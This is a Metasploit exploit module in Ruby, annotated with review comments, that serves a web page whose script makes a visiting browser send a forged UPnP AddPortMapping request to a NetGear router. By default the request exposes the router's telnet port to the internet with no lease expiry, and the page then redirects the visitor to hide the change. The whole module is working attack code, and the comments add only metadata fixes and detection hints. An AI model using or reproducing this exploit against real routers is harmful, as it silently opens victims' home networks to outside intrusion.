require 'msf/core' | |
# Metasploit exploit module (legacy "Metasploit3" class name).
#
# Serves an HTML page; a browser on the router's LAN that loads the page is
# made to POST a UPnP AddPortMapping request to the router (cross-site
# request forgery).  Review notes below cover the validity problems in the
# metadata and what a defender can observe on the device side.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # Embedded HTTP server mixin: supplies the request callback
  # (on_request_uri) and send_response_html used below.
  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers module metadata and the three operator options.
  #
  # @param info [Hash] metadata hash merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NetGear UPnP CSRF',
      'Description'    => %q{
This module triggers a UPnP mapping via CSRF on the NetGear WNDR3400v3 and other NetGear routers.
      },
      'Author'         => [ 'phikshun' ],
      'License'        => MSF_LICENSE,
      # Legacy SVN keyword field; carries no meaning outside an SVN checkout.
      'Version'        => '$Revision: 14774 $',
      # NOTE(review): 'NA' is not a recognised reference type (CVE, URL, ...);
      # the framework's module linting is likely to flag this entry.
      'References'     =>
        [
          [ 'NA', 'NA' ],
        ],
      'Platform'       => 'linux',
      'Privileged'     => false,
      # The module only serves a page and never expects a session back,
      # so no payload handler is started.
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => 'true',
        },
      'Targets'        =>
        [
          [ 'Netgear WNDR3400v3', { }, ],
        ],
      'DefaultTarget'  => 0,
      # NOTE(review): not a parseable date; the framework expects a real
      # date string (example format: 'Jan 01 2013').
      'DisclosureDate' => '0 day, yo'))

    # EXTPORT/INTPORT become NewExternalPort/NewInternalPort in the SOAP body
    # built by generate_html.  INTIP is used twice there: as NewInternalClient
    # AND as the host the browser posts to (port 5000), so the router must be
    # reachable at INTIP and the mapping always points at that same address.
    # The values are operator-supplied and are interpolated into the page
    # without escaping.
    register_options(
      [
        OptPort.new('EXTPORT', [ true, "The external port to map", 2323 ]),
        OptPort.new('INTPORT', [ true, "The internal port to map", 23 ]),
        OptString.new('INTIP', [ true, "The internal IP to map to", '192.168.1.1' ])
      ], self.class)
  end

  # Builds the page served to the visiting browser.  The return value is the
  # heredoc assigned to +html+ (the assignment is the method's last expression;
  # the local itself is otherwise unused).
  #
  # What the page does, and what a defender can observe:
  # * jQuery is loaded over plaintext HTTP from a third-party CDN, so the page
  #   depends on outbound internet access and is itself open to tampering.
  # * The browser POSTs a SOAP AddPortMapping envelope to
  #   http://INTIP:5000/Public_UPNP_C3 with Content-Type text/plain; no
  #   SOAPAction header is set.  A control endpoint that insists on the SOAP
  #   content type and SOAPAction header, or that validates Origin/Referer,
  #   would reject this request.  On the device side, AddPortMapping calls
  #   arriving with a text/plain body are the thing to look for.
  # * NewLeaseDuration is 0 (an indefinite lease in UPnP IGD) and the mapping
  #   description is a fresh random 8-letter string per served page.
  # * Whatever the outcome of the POST, the page then redirects to
  #   linkedin.com, so the visitor only sees a redirect.
  #
  # @return [String] the HTML document
  def generate_html
    html = <<-EOS
<html>
<head>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.js"></script>
<script>
$(document).ready(function() {
var postdata = '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription>#{Rex::Text.rand_text_alpha(8)}</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration><NewInternalClient>#{datastore['INTIP']}</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>#{datastore['EXTPORT']}</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>#{datastore['INTPORT']}</NewInternalPort></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>'
$.ajax({
url: 'http://#{datastore['INTIP']}:5000/Public_UPNP_C3',
type: 'POST',
data: postdata,
dataType: 'xml',
contentType: 'text/plain',
complete: function() {
window.location = "http://www.linkedin.com";
},
});
});
</script>
</head>
<body>
<h1>Redirecting... Please Wait</h1>
</body>
</html>
EOS
  end

  # HttpServer callback: every request to the module's URI receives the page
  # from generate_html, regardless of path, method or client; nothing in
  # +request+ is inspected.
  #
  # @param cli the connected client (passed through to send_response_html)
  # @param request the incoming HTTP request (unused)
  def on_request_uri(cli, request)
    print_status("Sending CSRF")
    send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
  end
end